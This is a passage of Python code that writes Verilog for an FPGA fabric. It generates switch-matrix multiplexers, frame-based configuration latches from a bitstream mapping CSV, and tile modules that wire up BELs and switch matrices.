print('\t'+'\t'+'end' , file=file)
print('\t'+'end', file=file)
print('', file=file)
print('\tassign CONFout = ConfigBits['+str(GlobalConfigBitsCounter)+'-1];', file=file)
print('\n', file=file)
# L:for k in 0 to 196 generate
# inst_LHQD1a : LHQD1
# Port Map(
# D => ConfigBitsInput(k*2),
# E => CLK,
# Q => ConfigBits(k*2) ) ;
# inst_LHQD1b : LHQD1
# Port Map(
# D => ConfigBitsInput((k*2)+1),
# E => MODE,
# Q => ConfigBits((k*2)+1) );
# end generate;
elif ConfigBitMode == 'FlipFlopChain':
print('\tgenvar k;\n', file=file)
# print('DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG ConfigBitMode == FlipFlopChain')
print('\tassign ConfigBitsInput = {ConfigBits['+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1-1:0],CONFin};\n', file=file)
print('\t// for k in 0 to Conf/2 generate', file=file)
			# iterate over all ceil(GlobalConfigBitsCounter/2) latch pairs (matches the VHDL 'for k in 0 to N-1 generate' range)
			print('\tfor (k=0; k<'+str(int(math.ceil(GlobalConfigBitsCounter/2.0)))+'; k=k+1) begin: L', file=file)
print('\t\t'+'LHQD1 inst_LHQD1a(', file=file)
print('\t\t'+'.D(ConfigBitsInput[k*2]),', file=file)
print('\t\t'+'.E(CLK),', file=file)
print('\t\t'+'.Q(ConfigBits[k*2])', file=file)
print('\t\t);', file=file)
print('', file=file)
print('\t\t'+'LHQD1 inst_LHQD1b(', file=file)
print('\t\t'+'.D(ConfigBitsInput[(k*2)+1]),', file=file)
print('\t\t'+'.E(MODE),', file=file)
print('\t\t'+'.Q(ConfigBits[(k*2)+1])', file=file)
print('\t\t);', file=file)
print('\tend\n', file=file)
print('\tassign CONFout = ConfigBits['+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1];', file=file)
print('\n', file=file)
# the switch matrix implementation
# we use the following variable to count the configuration bits of a long shift register which actually holds the switch matrix configuration
ConfigBitstreamPosition = 0
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
# print('debug: ',port)
if port != '0':
mux_size += 1
print('// switch matrix multiplexer ',line[0],'\t\tMUX-'+str(mux_size), file=file)
if mux_size == 0:
print('// WARNING unused multiplexer MUX-'+str(line[0]), file=file)
print('WARNING: unused multiplexer MUX-'+str(line[0])+' in tile '+str(CSVFile[0][0]))
		# just route through : can be used for auxiliary wires or diagonal routing (Manhattan style: just go through a switch matrix when turning)
		# can also be used to tap a wire. A double with a mid is nothing else than a single cascaded with another single, where the second single has only one '1' to cascade from the first single
if mux_size == 1:
port_index = 0
for port in line[1:]:
port_index += 1
if port == '1':
print('\tassign '+line[0]+' = '+CSVFile[0][port_index]+';', file=file)
elif port == 'l' or port == 'L' :
					print('\tassign '+line[0],' = 1\'b0;', file=file)
				elif port == 'h' or port == 'H':
					print('\tassign '+line[0],' = 1\'b1;', file=file)
elif port == '0':
					pass # we add this for the following test to throw an error if an unexpected character is used
else:
raise ValueError('wrong symbol in CSV file (must be 0, 1, H, or L) when executing function GenTileSwitchMatrixVerilog')
# this is the case for a configurable switch matrix multiplexer
if mux_size >= 2:
if int(GenerateDelayInSwitchMatrix) > 0:
#print('\tassign #'+str(GenerateDelayInSwitchMatrix)+' '+line[0]+'_input'+' = {', end='', file=file)
print('\tassign '+line[0]+'_input'+' = {', end='', file=file)
else:
print('\tassign '+line[0]+'_input'+' = {', end='', file=file)
port_index = 0
inputs_so_far = 0
# the reversed() changes the direction that we iterate over the line list.
# I changed it such that the left-most entry is located at the end of the concatenated vector for the multiplexing
# This was done such that the index from left-to-right in the adjacency matrix corresponds with the multiplexer select input (index)
# remove "len(line)-" if you remove the reversed(..)
for port in reversed(line[1:]):
port_index += 1
if port != '0':
inputs_so_far += 1
print(CSVFile[0][len(line)-port_index],end='', file=file)
# again the "len(line)-" is needed as we iterate in reverse direction over the line list.
# remove "len(line)-" if you remove the reversed(..)
if inputs_so_far == mux_size:
print('};', file=file)
else:
print(',',end='', file=file)
# int(math.ceil(math.log2(inputs_so_far))) tells us how many configuration bits a multiplexer takes
old_ConfigBitstreamPosition = ConfigBitstreamPosition
ConfigBitstreamPosition = ConfigBitstreamPosition + int(math.ceil(math.log2(inputs_so_far)))
# we have full custom MUX-4 and MUX-16 for which we have to generate code like:
# Verilog example custom MUX4
# inst_MUX4PTv4_J_l_AB_BEG1 : MUX4PTv4
# Port Map(
# IN1 => J_l_AB_BEG1_input(0),
# IN2 => J_l_AB_BEG1_input(1),
# IN3 => J_l_AB_BEG1_input(2),
# IN4 => J_l_AB_BEG1_input(3),
# S1 => ConfigBits(low_362),
# S2 => ConfigBits(low_362 + 1),
# O => J_l_AB_BEG1 );
# CUSTOM Multiplexers for switch matrix
if (MultiplexerStyle == 'custom') and (mux_size == 4):
MuxComponentName = 'MUX4PTv4'
if (MultiplexerStyle == 'custom') and (mux_size == 16):
MuxComponentName = 'MUX16PTv2'
if (MultiplexerStyle == 'custom') and (mux_size == 4 or mux_size == 16):
# inst_MUX4PTv4_J_l_AB_BEG1 : MUX4PTv4
print('\t'+MuxComponentName+' inst_'+MuxComponentName+'_'+line[0]+' ('+'\n',end='', file=file)
# Port Map(
# IN1 => J_l_AB_BEG1_input(0),
# IN2 => J_l_AB_BEG1_input(1), ...
for k in range(0,mux_size):
print('\t'+'.IN'+str(k+1)+' ('+line[0]+'_input['+str(k)+']),\n',end='', file=file)
# S1 => ConfigBits(low_362),
# S2 => ConfigBits(low_362 + 1, ...
for k in range(0,(math.ceil(math.log2(mux_size)))):
print('\t'+'.S'+str(k+1)+' (ConfigBits['+str(old_ConfigBitstreamPosition)+'+'+str(k)+']),\n',end='', file=file)
print('\t'+'.O ('+line[0]+')\n',end='', file=file)
print('\t);\n', file=file)
else: # generic multiplexer
if MultiplexerStyle == 'custom':
print('HINT: creating a MUX-'+str(mux_size)+' for port '+line[0]+' in switch matrix for tile '+CSVFile[0][0])
# For reference, the VHDL equivalent of the generated assignment would be:
# J_l_AB_BEG1 <= J_l_AB_BEG1_input(TO_INTEGER(ConfigBits(363 downto 362)));
print('\tassign '+line[0]+' = '+line[0]+'_input[',end='', file=file)
print('ConfigBits['+str(ConfigBitstreamPosition-1)+':'+str(old_ConfigBitstreamPosition)+']];', file=file)
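# Illustrative example of the generated Verilog line (signal name and bit positions taken from the
# VHDL reference above, assuming a MUX-4 whose select bits sit at ConfigBits[363:362]):
#   assign J_l_AB_BEG1 = J_l_AB_BEG1_input[ConfigBits[363:362]];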
print(' ', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
if SwitchMatrixDebugSignals == True:
ConfigBitstreamPosition = 0
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
if mux_size >= 2:
old_ConfigBitstreamPosition = ConfigBitstreamPosition
ConfigBitstreamPosition = ConfigBitstreamPosition + int(math.ceil(math.log2(mux_size)))
print('\tassign DEBUG_select_'+line[0]+' = ConfigBits['+str(ConfigBitstreamPosition-1)+':'+str(old_ConfigBitstreamPosition)+'];', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
# just the final end of architecture
print('\n'+'endmodule', file=file)
return
def GenerateConfigMemVerilog( tile_description, module, file ):
# count total number of configuration bits for tile
GlobalConfigBitsCounter = 0
for line in tile_description:
if (line[0] == 'BEL') or (line[0] == 'MATRIX'):
if (GetNoConfigBitsFromFile(line[VHDL_file_position])) != 'NULL':
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(GetNoConfigBitsFromFile(line[VHDL_file_position]))
# we use a file to describe the exact configuration bits to frame mapping
# the following command generates an init file with a simple enumerated default mapping (e.g. 'LUT4AB_ConfigMem.init.csv')
# if we run this function again, but have such a file (without the .init), then that mapping will be used
MappingFile = GenerateConfigMemInit( tile_description, module, file, GlobalConfigBitsCounter )
# test if we have a bitstream mapping file
# if not, we will take the default, which was passed on from GenerateConfigMemInit
if os.path.exists(module+'.csv'):
print('# found bitstream mapping file '+module+'.csv'+' for tile '+tile_description[0][0])
MappingFile = [i.strip('\n').split(',') for i in open(module+'.csv')]
# clean comments empty lines etc. in the mapping file
MappingFile = RemoveComments(MappingFile)
# clean the '_' symbols in the used_bits_mask field (they had been introduced to make that field a little more readable)
for line in MappingFile:
# TODO does not like white spaces tabs etc
# print('DEBUG BEFORE line[used_bits_mask]:',module ,line[frame_name] ,line[used_bits_mask])
line[used_bits_mask] = re.sub('_', '', line[used_bits_mask])
# print('DEBUG AFTER line[used_bits_mask]:',module ,line[frame_name] ,line[used_bits_mask])
# we should have as many lines as we have frames (=MaxFramesPerCol)
if str(len(MappingFile)) != str(MaxFramesPerCol):
print('WARNING: the bitstream mapping file has only '+str(len(MappingFile))+' entries but MaxFramesPerCol is '+str(MaxFramesPerCol))
# we should have as many lines as we have frames (=MaxFramesPerCol)
# we also check used_bits_mask (a vector as long as a frame that contains a '1' for every used bit and a '0' for unused/padded bits)
UsedBitsCounter = 0
for line in MappingFile:
if line[used_bits_mask].count('1') > FrameBitsPerRow:
raise ValueError('bitstream mapping file '+module+'.csv has too many 1-elements in bitmask for frame : '+line[frame_name])
if (line[used_bits_mask].count('1') + line[used_bits_mask].count('0')) != FrameBitsPerRow:
# print('DEBUG LINE: ', line)
raise ValueError('bitstream mapping file '+module+'.csv has a bitmask of wrong length for frame : '+line[frame_name])
# we also count the used bits over all frames
UsedBitsCounter += line[used_bits_mask].count('1')
if UsedBitsCounter != GlobalConfigBitsCounter:
raise ValueError('bitstream mapping file '+module+'.csv has a bitmask mismatch; bitmask has in total '+str(UsedBitsCounter)+' 1-values for '+str(GlobalConfigBitsCounter)+' bits')
# write module
module_header_ports = 'FrameData, FrameStrobe, ConfigBits'
CSVFile = ''
GenerateVerilog_Header(module_header_ports, file, module, package='', NoConfigBits=str(GlobalConfigBitsCounter), MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow))
# the port definitions are generic
print('\tinput [FrameBitsPerRow-1:0] FrameData;', file=file)
print('\tinput [MaxFramesPerCol-1:0] FrameStrobe;', file=file)
print('\toutput [NoConfigBits-1:0] ConfigBits;', file=file)
# one_line('frame_name')('frame_index')('bits_used_in_frame')('used_bits_mask')('ConfigBits_ranges')
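# Hedged example of one mapping line, assuming FrameBitsPerRow = 32 (names and values illustrative):
#   frame0, 0, 32, 1111_1111_1111_1111_1111_1111_1111_1111, 31:0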
# frame signal declaration ONLY for the bits actually used
UsedFrames = [] # keeps track about the frames that are actually used
AllConfigBitsOrder = [] # stores a list of ConfigBits indices in exactly the order defined in the range statements in the frames
for line in MappingFile:
bits_used_in_frame = line[used_bits_mask].count('1')
if bits_used_in_frame > 0:
print('\twire ['+str(bits_used_in_frame)+'-1:0] '+line[frame_name]+';', file=file)
UsedFrames.append(line[frame_index])
# The actual ConfigBits are given as address ranges starting at position ConfigBits_ranges
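# Hedged examples: a range item '7:4' expands (MSB first) to indices [7, 6, 5, 4],
# '4:7' expands to [4, 5, 6, 7], and a single item '9' simply appends index 9.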
ConfigBitsOrder = []
for RangeItem in line[ConfigBits_ranges:]:
if ':' in RangeItem: # we have a range
left, right = re.split(':',RangeItem)
left = int(left)
right = int(right)
if left < right:
step = 1
else:
step = -1
right += step # this makes the python range inclusive, otherwise the last item (which is actually right) would be missing
for k in range(left,right,step):
if k in ConfigBitsOrder:
raise ValueError('Configuration bit index '+str(k)+' already allocated in ', module, line[frame_name])
else:
ConfigBitsOrder.append(int(k))
elif RangeItem.isdigit():
if int(RangeItem) in ConfigBitsOrder:
raise ValueError('Configuration bit index '+str(RangeItem)+' already allocated in ', module, line[frame_name])
else:
ConfigBitsOrder.append(int(RangeItem))
else:
# raise ValueError('Range '+str(RangeItem)+' cannot be resolved for frame : '+line[frame_name])
print('Range '+str(RangeItem)+' cannot be resolved for frame : '+line[frame_name])
print('DEBUG:',line)
if len(ConfigBitsOrder) != bits_used_in_frame:
raise ValueError('ConfigBitsOrder definition mismatch: the number of 1s in the mask does not match ConfigBits_ranges for frame : '+line[frame_name])
AllConfigBitsOrder += ConfigBitsOrder
# instantiate latches for only the used frame bits
print('\n//instantiate frame latches' , file=file)
AllConfigBitsCounter = 0
for frame in UsedFrames:
used_bits = MappingFile[int(frame)][int(used_bits_mask)]
# print('DEBUG: ',module, used_bits,' : ',AllConfigBitsOrder)
for k in range(FrameBitsPerRow):
# print('DEBUG: ',module, used_bits,' : ',k, used_bits[k],'AllConfigBitsCounter',AllConfigBitsCounter, str(AllConfigBitsOrder[AllConfigBitsCounter]))
if used_bits[k] == '1':
print('\tLHQD1 Inst_'+MappingFile[int(frame)][int(frame_name)]+'_bit'+str(FrameBitsPerRow-1-k)+'(', file=file)
# The next one is a little tricky:
# k iterates over the bit_mask left to right from k=0..(FrameBitsPerRow-1) (k=0 is the left-most (=first) character)
# But that character represents the MSB inside the frame, which iterates FrameBitsPerRow-1..0
# bit_mask[0], bit_mask[1], bit_mask[2], ...
# FrameData[FrameBitsPerRow-1-0], FrameData[FrameBitsPerRow-1-1], FrameData[FrameBitsPerRow-1-2],
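# Hedged example, assuming FrameBitsPerRow = 32: mask position k=0 (left-most character)
# is latched from FrameData[31], k=1 from FrameData[30], ..., k=31 from FrameData[0].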
print('\t.D(FrameData['+str(FrameBitsPerRow-1-k)+']),', file=file)
print('\t.E(FrameStrobe['+str(frame)+']),', file=file)
print('\t.Q(ConfigBits['+str(AllConfigBitsOrder[AllConfigBitsCounter])+'])', file=file)
print('\t);\n', file=file)
AllConfigBitsCounter += 1
print('endmodule', file=file)
return
def GenerateTileVerilog( tile_description, module, file ):
MatrixInputs = []
MatrixOutputs = []
TileInputs = []
TileOutputs = []
BEL_Inputs = []
BEL_Outputs = []
AllJumpWireList = []
NuberOfSwitchMatricesWithConfigPort = 0
# We first check if we need a configuration port
# Currently we assume that each primitive needs a configuration port
# However, a switch matrix can have no switch matrix multiplexers
# (e.g., when only bouncing back in border termination tiles)
# we can detect this as each switch matrix file contains a comment // NumberOfConfigBits
# NumberOfConfigBits:0 tells us that the switch matrix does not have a config port
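# Hedged example of the marker scanned by GetVerilogDeclarationForFile (defined further below):
#   // NumberOfConfigBits:0   <- this exact substring marks a switch matrix without a config port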
# TODO: we don't do this and always create a configuration port for each tile. This may leave the CLK and MODE ports dangling, which will throw a warning
TileTypeMarker = False
for line in tile_description:
if line[0] == 'TILE':
TileType = line[TileType_position]
TileTypeMarker = True
if TileTypeMarker == False:
raise ValueError('Could not find tile type in function GenerateTileVerilog')
# the initial Verilog header generation is shared up to the port declarations
# in order to use GenerateVerilog_Header, we have to count the number of configuration bits by scanning all files for the "Generic ( NoConfigBits...
GlobalConfigBitsCounter = 0
if ConfigBitMode == 'frame_based':
for line in tile_description:
if (line[0] == 'BEL') or (line[0] == 'MATRIX'):
if (GetNoConfigBitsFromFile(line[VHDL_file_position])) != 'NULL':
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(GetNoConfigBitsFromFile(line[VHDL_file_position]))
# GenerateVerilog_Header(file, module, NoConfigBits=str(GlobalConfigBitsCounter))
module_header_ports_list = GetTileComponentPort_Verilog(tile_description, 'NORTH')
module_header_ports_list.extend(GetTileComponentPort_Verilog(tile_description, 'EAST'))
module_header_ports_list.extend(GetTileComponentPort_Verilog(tile_description, 'SOUTH'))
module_header_ports_list.extend(GetTileComponentPort_Verilog(tile_description, 'WEST'))
module_header_ports = ', '.join(module_header_ports_list)
ExternalPorts = []
for line in tile_description:
if line[0] == 'BEL':
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
ExternalPorts = ExternalPorts + (GetComponentPortsFromFile(line[VHDL_file_position], port='external', BEL_Prefix = BEL_prefix_string+'BEL_prefix_string_marker'))
SharedExternalPorts = []
if ExternalPorts != []:
for item in ExternalPorts:
if re.search('SHARED_PORT', item):
shared_port = re.sub(':.*', '',re.sub('.*BEL_prefix_string_marker', '', item)).strip()
if shared_port not in SharedExternalPorts:
bel_port = re.split(' | ',re.sub('.*BEL_prefix_string_marker', '', item))
if bel_port[2] == 'in':
module_header_ports += ', '+bel_port[0]
elif bel_port[2] == 'out':
module_header_ports += ', '+bel_port[0]
SharedExternalPorts.append(shared_port)
else:
bel_port = re.split(' | ',re.sub('BEL_prefix_string_marker', '', item))
if bel_port[2] == 'in':
module_header_ports += ', '+bel_port[0]
elif bel_port[2] == 'out':
module_header_ports += ', '+bel_port[0]
if ConfigBitMode == 'frame_based':
if GlobalConfigBitsCounter > 0:
#module_header_ports += ', FrameData, FrameStrobe'
module_header_ports += ', FrameData, FrameData_O, FrameStrobe, FrameStrobe_O'
else :
module_header_ports += ', FrameData, FrameData_O, FrameStrobe, FrameStrobe_O'
else:
if ConfigBitMode == 'FlipFlopChain':
module_header_ports += ', MODE, CONFin, CONFout, CLK'
elif ConfigBitMode == 'frame_based':
module_header_ports += ', ConfigBits'
# insert CLB, I/O (or whatever BEL) component declaration
# specified in the fabric csv file after the 'BEL' key word
BEL_VHDL_riles_processed = [] # we use this list to check if we have seen a BEL description before so we only insert one component declaration
module_header_files = []
for line in tile_description:
if line[0] == 'BEL':
Inputs = []
Outputs = []
if line[VHDL_file_position] not in BEL_VHDL_riles_processed:
module_header_files.append(line[VHDL_file_position].replace('vhdl','v'))
BEL_VHDL_riles_processed.append(line[VHDL_file_position])
# we need the BEL ports (a little later) so we take them on the way
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
Inputs, Outputs = GetComponentPortsFromFile(line[VHDL_file_position], BEL_Prefix=BEL_prefix_string)
BEL_Inputs = BEL_Inputs + Inputs
BEL_Outputs = BEL_Outputs + Outputs
# insert switch matrix component declaration
# specified in the fabric csv file after the 'MATRIX' key word
MatrixMarker = False
for line in tile_description:
if line[0] == 'MATRIX':
if MatrixMarker == True:
raise ValueError('More than one switch matrix defined for tile '+TileType+'; exiting GenerateTileVerilog')
NuberOfSwitchMatricesWithConfigPort = NuberOfSwitchMatricesWithConfigPort + GetVerilogDeclarationForFile(line[VHDL_file_position])
module_header_files.append(line[VHDL_file_position].replace('vhdl','v'))
# we need the switch matrix ports (a little later)
MatrixInputs, MatrixOutputs = GetComponentPortsFromFile(line[VHDL_file_position])
MatrixMarker = True
if MatrixMarker == False:
raise ValueError('Could not find switch matrix definition for tile type '+TileType+' in function GenerateTileVerilog')
if ConfigBitMode == 'frame_based' and GlobalConfigBitsCounter > 0:
module_header_files.append(module+'_ConfigMem.v')
GenerateVerilog_Header(module_header_ports, file, module, package='', NoConfigBits=str(GlobalConfigBitsCounter), MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow), module_header_files=module_header_files)
PrintTileComponentPort_Verilog (tile_description, 'NORTH', file)
PrintTileComponentPort_Verilog (tile_description, 'EAST', file)
PrintTileComponentPort_Verilog (tile_description, 'SOUTH', file)
PrintTileComponentPort_Verilog (tile_description, 'WEST', file)
# now we have to scan all BELs if they use external pins, because they have to be exported to the tile module
ExternalPorts = []
for line in tile_description:
if line[0] == 'BEL':
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
ExternalPorts = ExternalPorts + (GetComponentPortsFromFile(line[VHDL_file_position], port='external', BEL_Prefix = BEL_prefix_string+'BEL_prefix_string_marker'))
# if we found BELs with top-level IO ports, we just pass them through
SharedExternalPorts = []
if ExternalPorts != []:
print('\t// Tile IO ports from BELs', file=file)
for item in ExternalPorts:
# if a port is flagged with the 'SHARED_PORT' comment, we declare that port only once
# we use the string 'BEL_prefix_string_marker' to separate the port name from the prefix
if re.search('SHARED_PORT', item):
# we firstly get the plain port name without comments, whitespaces, etc.
# we place that in the SharedExternalPorts list to check if that port was declared earlier
shared_port = re.sub(':.*', '',re.sub('.*BEL_prefix_string_marker', '', item)).strip()
if shared_port not in SharedExternalPorts:
bel_port = re.split(' | ',re.sub('.*BEL_prefix_string_marker', '', item))
if bel_port[2] == 'in':
print('\tinput '+bel_port[0]+';', file=file)
elif bel_port[2] == 'out':
print('\toutput '+bel_port[0]+';', file=file)
SharedExternalPorts.append(shared_port)
else:
bel_port = re.split(' | ',re.sub('BEL_prefix_string_marker', '', item))
if bel_port[2] == 'in':
print('\tinput '+bel_port[0]+';', file=file)
elif bel_port[2] == 'out':
print('\toutput '+bel_port[0]+';', file=file)
# the rest is a shared text block
if ConfigBitMode == 'frame_based':
if GlobalConfigBitsCounter > 0:
#print('\tinput [FrameBitsPerRow-1:0] FrameData; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
#print('\tinput [MaxFramesPerCol-1:0] FrameStrobe; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register ', file=file)
print('\tinput [FrameBitsPerRow-1:0] FrameData; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\toutput [FrameBitsPerRow-1:0] FrameData_O;', file=file)
print('\tinput [MaxFramesPerCol-1:0] FrameStrobe; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\toutput [MaxFramesPerCol-1:0] FrameStrobe_O;', file=file)
else :
print('\tinput [FrameBitsPerRow-1:0] FrameData; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\toutput [FrameBitsPerRow-1:0] FrameData_O;', file=file)
print('\tinput [MaxFramesPerCol-1:0] FrameStrobe; //CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\toutput [MaxFramesPerCol-1:0] FrameStrobe_O;', file=file)
GenerateVerilog_PortsFooter(file, module, ConfigPort=False)
else:
GenerateVerilog_PortsFooter(file, module)
# Verilog signal declarations
print('//signal declarations', file=file)
# BEL port wires
print('//BEL ports (e.g., slices)', file=file)
for port in (BEL_Inputs + BEL_Outputs):
print('\twire '+port+';', file=file)
# Jump wires
print('//jump wires', file=file)
for line in tile_description:
if line[0] == 'JUMP':
if (line[source_name] == '') or (line[destination_name] == ''):
raise ValueError('Either source or destination port for JUMP wire missing in function GenerateTileVHDL')
# we don't add ports or a corresponding signal name if we have a NULL driver (which we use as an exception for GND and VCC (VCC0, GND0))
if not re.search('NULL', line[source_name], flags=re.IGNORECASE):
print('\twire ['+str(line[wires])+'-1:0] '+line[source_name]+';', file=file)
# we need the jump wires for the switch matrix component instantiation..
for k in range(int(line[wires])):
AllJumpWireList.append(str(line[source_name]+'('+str(k)+')'))
# internal configuration data signal to daisy-chain all BELs (if any and in the order they are listed in the fabric.csv)
print('//internal configuration data signal to daisy-chain all BELs (if any and in the order they are listed in the fabric.csv)', file=file)
# the signal has to be number of BELs+2 bits wide (Bel_counter+1 downto 0)
BEL_counter = 0
for line in tile_description:
if line[0] == 'BEL':
BEL_counter += 1
# we chain switch matrices only to the configuration port, if they really contain configuration bits
# i.e. switch matrices have a config port which is indicated by "NumberOfConfigBits:0 is false"
# The following conditional was intended to only generate the config_data signal if anything is actually configured
# however, we leave it and just use this signal as conf_data(0 downto 0) for simply routing through CONFin to CONFout
# maybe even useful if we want to add a buffer here
# if (Bel_Counter + NuberOfSwitchMatricesWithConfigPort) > 0
#print('\twire ['+str(BEL_counter+NuberOfSwitchMatricesWithConfigPort)+':0] conf_data;', file=file)
if GlobalConfigBitsCounter > 0:
print('\twire [NoConfigBits-1:0] ConfigBits;', file=file)
# Cascading of routing for wires spanning more than one tile
print('\n// Cascading of routing for wires spanning more than one tile', file=file)
print('\tassign FrameData_O = FrameData;', file=file)
print('\tassign FrameStrobe_O = FrameStrobe;', file=file)
for line in tile_description:
if line[0] in ['NORTH','EAST','SOUTH','WEST']:
span=abs(int(line[X_offset]))+abs(int(line[Y_offset]))
# in case a signal spans 2 or more tiles in any direction
if (span >= 2) and (line[source_name]!='NULL') and (line[destination_name]!='NULL'):
high_bound_index = (span*int(line[wires]))-1
print('\tassign '+line[source_name]+'['+str(high_bound_index)+'-'+str(line[wires])+':0]',end='', file=file)
print(' = '+line[destination_name]+'['+str(high_bound_index)+':'+str(line[wires])+'];', file=file)
# top configuration data daisy chaining
if ConfigBitMode == 'FlipFlopChain':
print('// top configuration data daisy chaining', file=file)
print('\tassign conf_data[$low(conf_data)] = CONFin; // conf_data\'low=0 and CONFin is from tile module', file=file)
print('\tassign CONFout = conf_data[$high(conf_data)]; // CONFout is from tile module', file=file)
# the <module>_ConfigMem module is only parametrized through generics, so we hard code its instantiation here
if ConfigBitMode == 'frame_based' and GlobalConfigBitsCounter > 0:
print('\n// configuration storage latches', file=file)
print('\t'+module+'_ConfigMem Inst_'+module+'_ConfigMem (', file=file)
print('\t.FrameData(FrameData),', file=file)
print('\t.FrameStrobe(FrameStrobe),', file=file)
print('\t.ConfigBits(ConfigBits)', file=file)
print('\t);', file=file)
# BEL component instantiations
print('\n//BEL component instantiations', file=file)
All_BEL_Inputs = [] # the right hand signal name which gets a BEL prefix
All_BEL_Outputs = [] # the right hand signal name which gets a BEL prefix
left_All_BEL_Inputs = [] # the left hand port name which does not get a BEL prefix
left_All_BEL_Outputs = [] # the left hand port name which does not get a BEL prefix
BEL_counter = 0
BEL_ConfigBitsCounter = 0
for line in tile_description:
if line[0] == 'BEL':
BEL_Inputs = [] # the right hand signal name which gets a BEL prefix
BEL_Outputs = [] # the right hand signal name which gets a BEL prefix
left_BEL_Inputs = [] # the left hand port name which does not get a BEL prefix
left_BEL_Outputs = [] # the left hand port name which does not get a BEL prefix
ExternalPorts = []
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
# the BEL I/Os that go to the switch matrix
BEL_Inputs, BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position], BEL_Prefix=BEL_prefix_string)
left_BEL_Inputs, left_BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position])
# the BEL I/Os that go to the tile top module
# ExternalPorts = GetComponentPortsFromFile(line[VHDL_file_position], port='external', BEL_Prefix=BEL_prefix_string)
ExternalPorts = GetComponentPortsFromFile(line[VHDL_file_position], port='external')
# we remember All_BEL_Inputs and All_BEL_Outputs as we need these pins for the switch matrix
All_BEL_Inputs = All_BEL_Inputs + BEL_Inputs
All_BEL_Outputs = All_BEL_Outputs + BEL_Outputs
left_All_BEL_Inputs = left_All_BEL_Inputs + left_BEL_Inputs
left_All_BEL_Outputs = left_All_BEL_Outputs + left_BEL_Outputs
EntityName = GetComponentEntityNameFromFile(line[VHDL_file_position])
print('\t'+EntityName+' Inst_'+BEL_prefix_string+EntityName+' (', file=file)
for k in range(len(BEL_Inputs+BEL_Outputs)):
print('\t.'+(left_BEL_Inputs+left_BEL_Outputs)[k]+'('+(BEL_Inputs+BEL_Outputs)[k]+'),', file=file)
# top level I/Os (if any) just get connected directly
if ExternalPorts != []:
print('\t//I/O primitive pins go to tile top level module (not further parsed) ', file=file)
for item in ExternalPorts:
# print('DEBUG ExternalPort :',item)
port = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
port=(replace(port, substitutions))
if re.search('SHARED_PORT', item):
print('\t.'+port+'('+port+'),', file=file)
else: # if not SHARED_PORT then add BEL_prefix_string to signal name
print('\t.'+port+'('+BEL_prefix_string+port+'),', file=file)
# global configuration port
if ConfigBitMode == 'FlipFlopChain':
GenerateVerilog_Conf_Instantiation(file=file, counter=BEL_counter, close=True)
if ConfigBitMode == 'frame_based':
BEL_ConfigBits = GetNoConfigBitsFromFile(line[VHDL_file_position])
if BEL_ConfigBits != 'NULL':
if int(BEL_ConfigBits) == 0:
#print('\t.ConfigBits(0)', file=file)
last_pos = file.tell()
for k in range(20):
file.seek(last_pos -k) # scan character by character backwards and look for ','
my_char = file.read(1)
if my_char == ',':
file.seek(last_pos -k) # place seek pointer to last ',' position and overwrite with a space
print(' ', end='', file=file)
break # stop scan
file.seek(0, os.SEEK_END) # go back to usual...
print('\t);\n', file=file)
else:
print('\t.ConfigBits(ConfigBits['+str(BEL_ConfigBitsCounter + int(BEL_ConfigBits))+'-1:'+str(BEL_ConfigBitsCounter)+'])', file=file)
print('\t);\n', file=file)
BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
# for the next BEL (if any) for cascading configuration chain (this information is also needed for chaining the switch matrix)
BEL_counter += 1
# switch matrix component instantiation
# important to know:
# Each switch matrix module is built up in a specific order:
# 1.a) interconnect wire INPUTS (in the order defined by the fabric file,)
# 2.a) BEL primitive INPUTS (in the order the BEL-VHDLs are listed in the fabric CSV)
# within each BEL, the order from the module is maintained
# Note that INPUTS refers to the view of the switch matrix! Which corresponds to BEL outputs at the actual BEL
# 3.a) JUMP wire INPUTS (in the order defined by the fabric file)
# 1.b) interconnect wire OUTPUTS
# 2.b) BEL primitive OUTPUTS
# Again: OUTPUTS refers to the view of the switch matrix which corresponds to BEL inputs at the actual BEL
# 3.b) JUMP wire OUTPUTS
# The switch matrix uses single bit ports (std_logic and not std_logic_vector)!!!
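# Hedged summary of the resulting connection order used in the instantiation below:
#   switch matrix INPUT ports  <- tile routing inputs, then BEL outputs, then jump wires
#   switch matrix OUTPUT ports -> tile routing outputs, then BEL inputs, then jump wires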
print('\n//switch matrix component instantiation', file=file)
for line in tile_description:
if line[0] == 'MATRIX':
BEL_Inputs = []
BEL_Outputs = []
BEL_Inputs, BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position])
